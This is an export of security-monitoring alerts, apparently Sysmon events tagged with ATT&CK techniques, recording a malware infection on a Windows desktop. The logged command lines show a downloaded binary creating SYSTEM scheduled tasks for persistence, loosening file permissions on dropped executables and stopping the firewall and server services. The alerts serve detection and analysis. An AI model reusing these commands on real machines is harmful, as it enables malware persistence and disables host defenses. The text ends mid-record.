Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop SharedAccess"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-d152-5ec7-0000-0010ba0e1900}"",""parentProcessId"":""1352"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""net stop SharedAccess""}}}" +"May 22, 2020 @ 15:27:59.077",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:14.789 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900} +ProcessId: 6960 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: net stop LanmanServer +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00106ba41800} +ParentProcessId: 2012 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c net stop 
LanmanServer""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:14.792400500Z"",""eventRecordID"":""964"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:14.789\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900}\r\nProcessId: 6960\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: net stop LanmanServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00106ba41800}\r\nParentProcessId: 2012\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c net stop LanmanServer\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:14.789"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-00108a111900}"",""processId"":""6960"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""net stop LanmanServer"",""currentDirectory"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-00106ba41800}"",""parentProcessId"":""2012"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c net stop LanmanServer""}}}" +"May 22, 2020 @ 15:27:59.046",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:14.733 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900} +ProcessId: 1352 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: net stop SharedAccess +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00100f9b1800} +ParentProcessId: 6504 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c net stop 
SharedAccess""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:14.753959700Z"",""eventRecordID"":""962"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:14.733\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900}\r\nProcessId: 1352\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: net stop SharedAccess\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00100f9b1800}\r\nParentProcessId: 6504\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c net stop SharedAccess\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:14.733"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-0010ba0e1900}"",""processId"":""1352"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""net stop SharedAccess"",""currentDirectory"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-00100f9b1800}"",""parentProcessId"":""6504"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c net stop SharedAccess""}}}" +"May 22, 2020 @ 15:27:59.031",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:14.723 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-0010380e1900} +ProcessId: 1388 +Image: C:\Windows\SysWOW64\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: schtasks /create /sc minute /mo 1 /tn ""Flash"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\JOHNWI~1\AppData\Local\Temp\Networks\taskmgr.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800} +ParentProcessId: 6516 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Flash"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\JOHNWI~1\AppData\Local\Temp\Networks\taskmgr.exe /p 
everyone:F""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:14.752193300Z"",""eventRecordID"":""961"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:14.723\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-0010380e1900}\r\nProcessId: 1388\r\nImage: C:\\Windows\\SysWOW64\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks /create /sc minute /mo 1 /tn \""Flash\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Networks\\taskmgr.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800}\r\nParentProcessId: 6516\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Flash\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Networks\\taskmgr.exe /p everyone:F\""\""""},""eventdata"":{""utcTime"":""2020-05-22 
13:19:14.723"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-0010380e1900}"",""processId"":""1388"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""schtasks /create /sc minute /mo 1 /tn \\\""Flash\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Networks\\\\taskmgr.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-001077981800}"",""parentProcessId"":""6516"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Flash\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Networks\\\\taskmgr.exe /p everyone:F\\\""""}}}" +"May 22, 2020 @ 15:27:57.188",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:12.800 +ProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800} +ProcessId: 6516 +Image: C:\Windows\SysWOW64\cmd.exe +FileVersion: 10.0.18362.449 (WinBuild.160101.0800) +Description: Windows Command Processor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: Cmd.Exe +CommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Flash"" /ru system /tr ""cmd /c echo Y|cacls 
C:\Users\JOHNWI~1\AppData\Local\Temp\Networks\taskmgr.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A +ParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ParentProcessId: 6980 +ParentImage: C:\Users\John Williams\Downloads\appveif.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\appveif.exe"" ""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:12.802331200Z"",""eventRecordID"":""952"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:12.800\r\nProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800}\r\nProcessId: 6516\r\nImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nFileVersion: 10.0.18362.449 (WinBuild.160101.0800)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Flash\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Networks\\taskmgr.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A\r\nParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nParentProcessId: 6980\r\nParentImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\appveif.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:12.800"",""processGuid"":""{df9fc3d3-d150-5ec7-0000-001077981800}"",""processId"":""6516"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""fileVersion"":""10.0.18362.449 (WinBuild.160101.0800)"",""description"":""Windows Command Processor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""Cmd.Exe"",""commandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Flash\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Networks\\\\taskmgr.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A"",""parentProcessGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""parentProcessId"":""6980"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:57.173",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:12.786 +ProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800} +ProcessId: 6520 +Image: C:\Windows\SysWOW64\cmd.exe +FileVersion: 10.0.18362.449 
(WinBuild.160101.0800) +Description: Windows Command Processor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: Cmd.Exe +CommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Netframework"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\John Williams\Downloads\appveif.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A +ParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ParentProcessId: 6980 +ParentImage: C:\Users\John Williams\Downloads\appveif.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\appveif.exe"" ""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:12.798234900Z"",""eventRecordID"":""951"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:12.786\r\nProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800}\r\nProcessId: 6520\r\nImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nFileVersion: 10.0.18362.449 (WinBuild.160101.0800)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Netframework\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\John Williams\\Downloads\\appveif.exe /p 
everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A\r\nParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nParentProcessId: 6980\r\nParentImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\appveif.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:12.786"",""processGuid"":""{df9fc3d3-d150-5ec7-0000-0010f8951800}"",""processId"":""6520"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""fileVersion"":""10.0.18362.449 (WinBuild.160101.0800)"",""description"":""Windows Command Processor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""Cmd.Exe"",""commandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Netframework\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A"",""parentProcessGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""parentProcessId"":""6980"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:57.157",10,"ATT&CK: Suspicious 
Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:12.764 +ProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800} +ProcessId: 6580 +Image: C:\Windows\SysWOW64\cmd.exe +FileVersion: 10.0.18362.449 (WinBuild.160101.0800) +Description: Windows Command Processor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: Cmd.Exe +CommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Miscfost"" /ru system /tr ""cmd /c C:\Windows\ime\appveif.exe"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A +ParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ParentProcessId: 6980 +ParentImage: C:\Users\John Williams\Downloads\appveif.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\appveif.exe"" ""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:12.783545400Z"",""eventRecordID"":""950"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:12.764\r\nProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800}\r\nProcessId: 6580\r\nImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nFileVersion: 10.0.18362.449 (WinBuild.160101.0800)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
Cmd.Exe\r\nCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Miscfost\"" /ru system /tr \""cmd /c C:\\Windows\\ime\\appveif.exe\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A\r\nParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nParentProcessId: 6980\r\nParentImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\appveif.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:12.764"",""processGuid"":""{df9fc3d3-d150-5ec7-0000-0010fe8d1800}"",""processId"":""6580"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""fileVersion"":""10.0.18362.449 (WinBuild.160101.0800)"",""description"":""Windows Command Processor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""Cmd.Exe"",""commandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Miscfost\\\"" /ru system /tr \\\""cmd /c C:\\\\Windows\\\\ime\\\\appveif.exe\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A"",""parentProcessGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""parentProcessId"":""6980"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:43.137",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""", +"May 22, 2020 @ 15:27:43.043",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""", +"May 22, 2020 @ 15:27:33.137",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'b187c4a14d4a0fc8b255a5e6dc68e1b1' +New 